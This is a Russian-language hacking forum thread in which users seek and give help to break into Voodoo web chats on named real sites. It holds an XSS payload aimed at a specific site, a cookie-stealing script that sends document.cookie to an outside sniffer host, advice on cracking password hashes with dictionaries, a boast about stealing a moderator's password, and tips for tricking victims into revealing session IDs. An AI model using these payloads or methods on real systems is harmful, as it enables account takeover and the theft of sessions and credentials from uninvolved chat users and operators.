Чаты Voodoo чаты

Discussion in 'Веб-уязвимости' started by bugaga, 27 Nov 2005.

  1. astalavista

    astalavista New Member

    Joined:
    21 Dec 2006
    Messages:
    24
    Likes Received:
    3
    Reputations:
    5
    iesli vas naidzotsa programa katori mojet download na ftp vse faili ia vas pamagu ;)
     
    1 person likes this.
  2. MisterX

    MisterX New Member

    Joined:
    9 Dec 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    в users.dat хранятся никнеймы, и хеши паролей пользователей чата ... но помоему уже никто data директорию в DocumentRoot не сует, в крайнем случае через .htaccess рубают.
     
  3. Антон_Глумов

    Joined:
    19 Jan 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0


    Можно поподробнее?

    ПОМОГИТЕ
    Как мне сформировать запрос если:
    адрес чата http://darkside.tomsk.ru/
    адрес снифера http://mysite.ru/snif.php


    Если возможно, попробуйте угнать акк модера
    nickname: toto
    password:???
     
  4. Silinbion

    Silinbion New Member

    Joined:
    25 Jan 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Народ! Я начинающий, ище маздайный античатер! расскажите мне как можно ломонуть вуду чат http://oko.sed.lg.ua:8080/chat/ , плиз! Но, ище, плиз пишете так чтоб было понятно даже юзеру. просто, я ище почти не соображаю в ломе чатов...
     
    #184 Silinbion, 26 Jan 2007
    Last edited: 6 Feb 2007
  5. ches

    ches New Member

    Joined:
    6 Mar 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    http://lom.dp.ua

    Народ кто может прощупать на уязвимость этот чат , по ходу напоминает вуду, но хотелось бы узнать как можно сделать себя админом, то бишь дать себе права админа ж)))
     
  6. bx_N

    bx_N Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    24
    Likes Received:
    14
    Reputations:
    1
    А чем тебе этот не устроил?
    _http://lom.dp.ua/view.php?f=10102"><script>alert(document.cookie)</script>
     
  7. ches

    ches New Member

    Joined:
    6 Mar 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    сорри втупил спасибо большое :)
     
  8. ches

    ches New Member

    Joined:
    6 Mar 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Один вопросик все же возник по поводу этой строчки , в окне , которое появляется высвечивается login: мой , пасс: без понятия чей(возможно админа) , и еще зашифрованый код.
    Вопрос : Чей это пасс - потому, что когда применяю пишет мол человек либо сидит в чате либо вы ввели неверные данные, опишите как работает эта комманда , зарание спасибо
     
    #188 ches, 8 Mar 2007
    Last edited: 8 Mar 2007
  9. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Догадываюсь что зашифрованный код это хеш
     
  10. ches

    ches New Member

    Joined:
    6 Mar 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    как его расшифровать ?
     
  11. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Его расшифровать нельзя,а вот скачать словарик потом скачать password pro (он слова из словаря шифрует по тому же алгоритму и сравнивает) можно.
     
  12. ches

    ches New Member

    Joined:
    6 Mar 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Мне подсказали что узнать пароль админа возможно только тогда, когда я достану его кукис, как это возможно, и есть ли какой то другой метод получения пароля админа? Неужели нету уязвимостей, никогда не поверю)
     
  13. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Ну тебе же дали Хss ими и воруй кукисы
     
  14. goodkit

    goodkit Member

    Joined:
    19 May 2006
    Messages:
    160
    Likes Received:
    30
    Reputations:
    2
    ЧАТ - Voodoo. Спизд***л пасс от логина модератора! Когда захожу прав как у обычного юзера, мне сказали(тут на ачате) что возможно есть специальные команды типа _ban_ _kill_ или чё-та типа того. Изучал исходники, ничего там не нашел! Что это может быть! ЭТо Аккаунт модератора - 100%!
     
  15. JRX

    JRX Elder - Старейшина

    Joined:
    16 Nov 2006
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    фига зло такое ..может его уже лишили модерских прав?? как заметили кражу пароля..?!
     
  16. goodkit

    goodkit Member

    Joined:
    19 May 2006
    Messages:
    160
    Likes Received:
    30
    Reputations:
    2
    Всё разобрался, оказывапется ссылка на админку была сделана на маленьком смайле слева вверху )
     
  17. EaSy

    EaSy New Member

    Joined:
    12 Apr 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru

    Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=(

    И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю.

    Заранее благадарю, с уважением ИЗ.
     
    1 person likes this.
  18. goodkit

    goodkit Member

    Joined:
    19 May 2006
    Messages:
    160
    Likes Received:
    30
    Reputations:
    2
    Чат действительно Voodoo, чё то он грузитца как будто у меня dial-up стоит :confused:

    Ну попповоду сниферов юзай поиск, тут про xss и сниферы уже можно томов 5 собрать! А сессию открой html страницу sendera (это тот прямоугольничег где ты текст печатаешь что бы отправить) в txt и найди session, выглядеть будет так session=dd165fb008f5aac025a34ec7fa788939

    Или там где мой статус, кликни правой кнопкой и зайди в свойства (смотрел чат через IE 6)

    Но предупреждаю! Я один раз с помощью СИ зоставил жертву выдать мне её сессию, но мне пришло лиж #1234, потом выяснил что в чате стоял фильтр!!! Так что придумаешь что нибудь!

    Так и есть, если просто вбить сессию то фильтр её отфильтрует!
     
    #198 goodkit, 12 Apr 2007
    Last edited: 12 Apr 2007
  19. cyber_rat

    cyber_rat New Member

    Joined:
    12 Apr 2007
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте. Помогите новичку с составлением запроса для XSS. Нашел стандартную уязвимость в одном Voodoo-чате :
    http://xxx.xxx/go.php?url=javascript:alert(/test/);
    Составил следущий код:
    http://ххх.ххх/go.php?url=javascript:img=new%20Image();img.src="http://s.netsec.ru/cyber_rat.gif?"+document.cookie;

    Но вместо рисунка появляется "[object]"

    И еще :
    alert(/test/); - выводит окошко с надписью /test/
    но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.
     
  20. syzspectroom

    syzspectroom New Member

    Joined:
    13 Apr 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    magic quotes=on
    ;)

    а нащет скрипта,думаю там филтр какой то стоит.
    ну и толку с етой XSS мало.. и так кукизы не передаются, да и с кукизов толку мало.. сессия не в них